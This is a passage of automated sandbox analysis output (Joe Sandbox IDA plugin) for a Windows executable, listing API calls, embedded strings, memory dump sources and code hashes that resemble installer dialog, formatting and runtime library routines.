    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    APIs
    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000CC0A9
    • GetNumberFormatW.KERNEL32(00000400,00000000,?,000F072C,?,?), ref: 000CC0F8
    Similarity
    • API ID: FormatInfoLocaleNumber
    • String ID:
    • API String ID: 2169056816-0
    APIs
    • GetLastError.KERNEL32(000B7886,?,00000400), ref: 000B7727
    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 000B7748
    Similarity
    • API ID: ErrorFormatLastMessage
    • String ID:
    • API String ID: 3479602957-0
    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000E2B9F,?,?,00000008,?,?,000E283F,00000000), ref: 000E2DD1
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000D082C
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    APIs
    • GetVersionExW.KERNEL32(?), ref: 000BC388
      • Part of subcall function 000BC3F7: __EH_prolog.LIBCMT ref: 000BC3FC
      • Part of subcall function 000BC3F7: CoCreateInstance.COMBASE(000E68A0,00000000,00000001,000E67D0,?), ref: 000BC41E
    Similarity
    • API ID: CreateH_prologInstanceVersion
    • String ID:
    • API String ID: 511865808-0
    Strings
    Similarity
    • API ID:
    • String ID: gj
    • API String ID: 0-4203073231
    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00020BA0,000D05F5), ref: 000D0B92
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    APIs
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    APIs
    • __EH_prolog.LIBCMT ref: 000CD877
      • Part of subcall function 000CC4F4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 000CC5DB
    • _wcslen.LIBCMT ref: 000CDB3D
    • _wcslen.LIBCMT ref: 000CDB46
    • SetWindowTextW.USER32(?,?), ref: 000CDBA4
    • _wcslen.LIBCMT ref: 000CDBE6
    • _wcsrchr.LIBVCRUNTIME ref: 000CDD2E
    • GetDlgItem.USER32(?,00000066), ref: 000CDD69
    • SetWindowTextW.USER32(00000000,?), ref: 000CDD79
    • SendMessageW.USER32(00000000,00000143,00000000,0010389A), ref: 000CDD87
    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000CDDB2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
    • API String ID: 2804936435-312220925
    • Opcode ID: d49e7426c0aa732882008ea1e00d0f907ba5eb6478a96d761b89843477794c8b
    • Instruction ID: 8a449e4414f77db7316fb44f570eae0f5cda4644d22275a33bdf9b76bec06433
    • Opcode Fuzzy Hash: d49e7426c0aa732882008ea1e00d0f907ba5eb6478a96d761b89843477794c8b
    • Instruction Fuzzy Hash: 82E15F72900258AADB24DBA4DD85FEE73BCEB05310F5484BAF609E7151EB749E84CF60
    APIs
    • _swprintf.LIBCMT ref: 000BF62E
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
      • Part of subcall function 000C30E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,000F3070,?,000BEC48,00000000,?,00000050,000F3070), ref: 000C3102
    • _strlen.LIBCMT ref: 000BF64F
    • SetDlgItemTextW.USER32(?,000F0274,?), ref: 000BF6AF
    • GetWindowRect.USER32(?,?), ref: 000BF6E9
    • GetClientRect.USER32(?,?), ref: 000BF6F5
    • GetWindowLongW.USER32(?,000000F0), ref: 000BF795
    • GetWindowRect.USER32(?,?), ref: 000BF7C2
    • SetWindowTextW.USER32(?,?), ref: 000BF7FB
    • GetSystemMetrics.USER32(00000008), ref: 000BF803
    • GetWindow.USER32(?,00000005), ref: 000BF80E
    • GetWindowRect.USER32(00000000,?), ref: 000BF83B
    • GetWindow.USER32(00000000,00000002), ref: 000BF8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
    • String ID: $%s:$CAPTION$d
    • API String ID: 2407758923-2512411981
    • Opcode ID: 0ebc2c48b00ca946d2258f938987f4af067af5347cc8c394f2b44218417fba9e
    • Instruction ID: ee527a17f367a5a07d77a47ed2cc6d8c43734a51cc5c19e9e039a60075ccf360
    • Opcode Fuzzy Hash: 0ebc2c48b00ca946d2258f938987f4af067af5347cc8c394f2b44218417fba9e
    • Instruction Fuzzy Hash: 4481A172208301AFD715DF68CD89BAFBBE9EBC8704F04492DFA84D7251D670E8098B52
    APIs
    • ___free_lconv_mon.LIBCMT ref: 000DDD16
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD8CE
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD8E0
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD8F2
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD904
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD916
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD928
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD93A
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD94C
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD95E
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD970
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD982
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD994
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD9A6
    • _free.LIBCMT ref: 000DDD0B
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000DDD2D
    • _free.LIBCMT ref: 000DDD42
    • _free.LIBCMT ref: 000DDD4D
    • _free.LIBCMT ref: 000DDD6F
    • _free.LIBCMT ref: 000DDD82
    • _free.LIBCMT ref: 000DDD90
    • _free.LIBCMT ref: 000DDD9B
    • _free.LIBCMT ref: 000DDDD3
    • _free.LIBCMT ref: 000DDDDA
    • _free.LIBCMT ref: 000DDDF7
    • _free.LIBCMT ref: 000DDE0F
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: ca6eb36eb09c994bd824ddb8c2f72728be8f721a436c1d21e4a322c3eef5aa8b
    • Instruction ID: 876a12d9e7d148449e28049962c3a3e4f7c1589809653fadf27ff9a98248ecf8
    • Opcode Fuzzy Hash: ca6eb36eb09c994bd824ddb8c2f72728be8f721a436c1d21e4a322c3eef5aa8b
    • Instruction Fuzzy Hash: 80311831A00305DFEF61AA78D849B96B3EAFF11311F14482BF45996392DA75EC44CA36
    APIs
    • _wcslen.LIBCMT ref: 000CA6E6
    • _wcslen.LIBCMT ref: 000CA786
    • GlobalAlloc.KERNEL32(00000040,?), ref: 000CA795
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 000CA7B6
    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000CA7DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
    • API String ID: 1777411235-4209811716
    • Opcode ID: 898ab5f2ae5dc7004fef789e39ce6f88a9b3f684d4bfc16741479221420ff388
    • Instruction ID: 56d511d36d24bae610c47540ebb4876b308c030745b259cf2b36c2f2911cb621
    • Opcode Fuzzy Hash: 898ab5f2ae5dc7004fef789e39ce6f88a9b3f684d4bfc16741479221420ff388
    • Instruction Fuzzy Hash: D53177322087457FE724AB209C46FAF77A8AF42724F14051EF500AA2D2FF64990883A6
    APIs
    • GetWindow.USER32(?,00000005), ref: 000CE801
    • GetClassNameW.USER32(00000000,?,00000800), ref: 000CE82D
      • Part of subcall function 000C3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,000BD523,00000000,.exe,?,?,00000800,?,?,?,000C9E4C), ref: 000C331C
    • GetWindowLongW.USER32(00000000,000000F0), ref: 000CE849
    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 000CE860
    • GetObjectW.GDI32(00000000,00000018,?), ref: 000CE874
    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 000CE89D
    • DeleteObject.GDI32(00000000), ref: 000CE8A4
    • GetWindow.USER32(00000000,00000002), ref: 000CE8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
    • String ID: STATIC
    • API String ID: 3820355801-1882779555
    • Opcode ID: 9db215009f99ff519574117debc6ff04cee75f02a1d15a26e1df8f130ddcb1d6
    • Instruction ID: a2c7fe8b9aa0536f4690a52ea7076061f5d1ea0b02ee9c267e7e7f6a21c5e3d0
    • Opcode Fuzzy Hash: 9db215009f99ff519574117debc6ff04cee75f02a1d15a26e1df8f130ddcb1d6
    • Instruction Fuzzy Hash: 24110632644B50BBE3216B70DC4AFEF3A9DAF95710F008039FA45A50D2DF648A4A86B5
    APIs
    • _free.LIBCMT ref: 000DA425
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000DA431
    • _free.LIBCMT ref: 000DA43C
    • _free.LIBCMT ref: 000DA447
    • _free.LIBCMT ref: 000DA452
    • _free.LIBCMT ref: 000DA45D
    • _free.LIBCMT ref: 000DA468
    • _free.LIBCMT ref: 000DA473
    • _free.LIBCMT ref: 000DA47E
    • _free.LIBCMT ref: 000DA48C
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 8b793f7dc0c509f60d545053a980b068ef271c33cdc2f9b2b1fff3862dd085e6
    • Instruction ID: 3b690d2124e851344e1b3e9f3384464e08a96eb8a789bb997ddb65dfc69a8578
    • Opcode Fuzzy Hash: 8b793f7dc0c509f60d545053a980b068ef271c33cdc2f9b2b1fff3862dd085e6
    • Instruction Fuzzy Hash: 8911E676A00208FFCB01EF54C856CD93BA5EF15351B0584A2FA1C8F273DA31EE519BA2
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 322700389-393685449
    • Opcode ID: 203337f4dd385372b22c26f0ce73e37c5da74cedc4a2f7affcb552f5da94c5ab
    • Instruction ID: 47aa0fb0a2b0bd0bb5ce3f84dd07a2f8d64376fb0bed44baf06b65d25766dfa5
    • Opcode Fuzzy Hash: 203337f4dd385372b22c26f0ce73e37c5da74cedc4a2f7affcb552f5da94c5ab
    • Instruction Fuzzy Hash: 6DB13571800309EFCF29EFA8D9819AEBBB5BF14310B54416BF9156B312D731DA51CBA2
    APIs
    • __EH_prolog.LIBCMT ref: 000BC3FC
    • CoCreateInstance.COMBASE(000E68A0,00000000,00000001,000E67D0,?), ref: 000BC41E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateH_prologInstance
    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
    • API String ID: 457505298-3505469590
    • Opcode ID: a140f6754792127611db49691b8f7343d3a5baf4edba23aae9a4e2360355b50d
    • Instruction ID: dca9d503c7d23aeb8b6b608a54471dc5ea2223d6b53cf2ceffe81c1d42500cfd
    • Opcode Fuzzy Hash: a140f6754792127611db49691b8f7343d3a5baf4edba23aae9a4e2360355b50d
    • Instruction Fuzzy Hash: 16714A71A00619AFEB14DFA5C894EAEB7B9EF48710B14015DE512FB2A1CB34AD41CB60
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • EndDialog.USER32(?,00000001), ref: 000CC7F0
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 000CC817
    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 000CC830
    • SetWindowTextW.USER32(?,?), ref: 000CC841
    • GetDlgItem.USER32(?,00000065), ref: 000CC84A
    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 000CC85E
    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 000CC874
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: MessageSend$Item$TextWindow$DialogParent
    • String ID: LICENSEDLG
    • API String ID: 4098686847-2177901306
    • Opcode ID: b61d054c2737956883441db64e44be467f3e3e4c88bb6c2441877b849911dc0e
    • Instruction ID: 0c82f59070540050659e02fdd76cac55aea6eb9298e90663d4837604d62f6b1f
    • Opcode Fuzzy Hash: b61d054c2737956883441db64e44be467f3e3e4c88bb6c2441877b849911dc0e
    • Instruction Fuzzy Hash: 9F21D632244604BBE7165B65EE49FBF3AADEB46B81F00801DF605E15A1CB529C419A71
    APIs
    • _wcslen.LIBCMT ref: 000BB5E2
      • Part of subcall function 000C26F1: GetSystemTime.KERNEL32(?), ref: 000C26FF
      • Part of subcall function 000C26F1: SystemTimeToFileTime.KERNEL32(?,?), ref: 000C270D
      • Part of subcall function 000C269A: __aulldiv.LIBCMT ref: 000C26A3
    • __aulldiv.LIBCMT ref: 000BB60E
    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 000BB615
    • _swprintf.LIBCMT ref: 000BB640
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • _wcslen.LIBCMT ref: 000BB64A
    • _swprintf.LIBCMT ref: 000BB6A0
    • _wcslen.LIBCMT ref: 000BB6AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
    • String ID: %u.%03u
    • API String ID: 2956649372-1114938957
    • Opcode ID: d3bf9581fa2a0fac0cb60a79d8d1deb8c3c5f9a77b56f996273fc2d24a508d26
    • Instruction ID: 343801bb8d1a2f878031786e6db30a80a07c98ed159fcf66cc0ce625f468608e
    • Opcode Fuzzy Hash: d3bf9581fa2a0fac0cb60a79d8d1deb8c3c5f9a77b56f996273fc2d24a508d26
    • Instruction Fuzzy Hash: 53217172A043406FD614EF65DC85EDF77ECEB94700F00492AB545E7252DB74DA0887B6
    APIs
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 000CBC2F
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000CBC40
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000CBC4E
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 000CBC5C
    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000CBC77
    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 000CBC9E
    • _swprintf.LIBCMT ref: 000CBCC4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
    • String ID: %s %s
    • API String ID: 385609497-2939940506
    • Opcode ID: 01beef57f8664a78ba95db4217fbb442da8ea09662e79dc69cfadf98eeecac7e
    • Instruction ID: 2761196077935e15f01c581a4370fc49247e25797d62e846fa0afe59a508ca62
    • Opcode Fuzzy Hash: 01beef57f8664a78ba95db4217fbb442da8ea09662e79dc69cfadf98eeecac7e
    • Instruction Fuzzy Hash: C02117B250018CABEB21DFA0EC85EEF3BACFF19704F040066FA05E6011E724DA49CB60
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,000BC43F,000BC441,00000000,00000000,D4CE042F,00000001,00000000,00000000,000BC32C,?,?,?,000BC43F,ROOT\CIMV2), ref: 000D0F49
    • MultiByteToWideChar.KERNEL32(00000000,00000000,000BC43F,?,00000000,00000000,?,?,?,?,?,000BC43F), ref: 000D0FC4
    • SysAllocString.OLEAUT32(00000000), ref: 000D0FCF
    • _com_issue_error.COMSUPP ref: 000D0FF8
    • _com_issue_error.COMSUPP ref: 000D1002
    • GetLastError.KERNEL32(80070057,D4CE042F,00000001,00000000,00000000,000BC32C,?,?,?,000BC43F,ROOT\CIMV2), ref: 000D1007
    • _com_issue_error.COMSUPP ref: 000D101A
    • GetLastError.KERNEL32(00000000,?,000BC43F,ROOT\CIMV2), ref: 000D1030
    • _com_issue_error.COMSUPP ref: 000D1043
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
    • String ID:
    • API String ID: 1353541977-0
    • Opcode ID: 694355eec166bd39628bb676df1277b34d548b4bfa260e37dcd655f4b859de9f
    • Instruction ID: 2b7e7719d24b8f8a2d293481fc0cc03d16e7f33ba59d4f92ca4a297b04a3fece
    • Opcode Fuzzy Hash: 694355eec166bd39628bb676df1277b34d548b4bfa260e37dcd655f4b859de9f
    • Instruction Fuzzy Hash: B141E771A00345ABD7109F68DC45BEEBBA9EF48710F20426BF509E7381DB7599408BB5
    APIs
    • _wcslen.LIBCMT ref: 000CE8EE
    • ShowWindow.USER32(?,00000000), ref: 000CEA5D
    • GetExitCodeProcess.KERNEL32(?,?), ref: 000CEA99
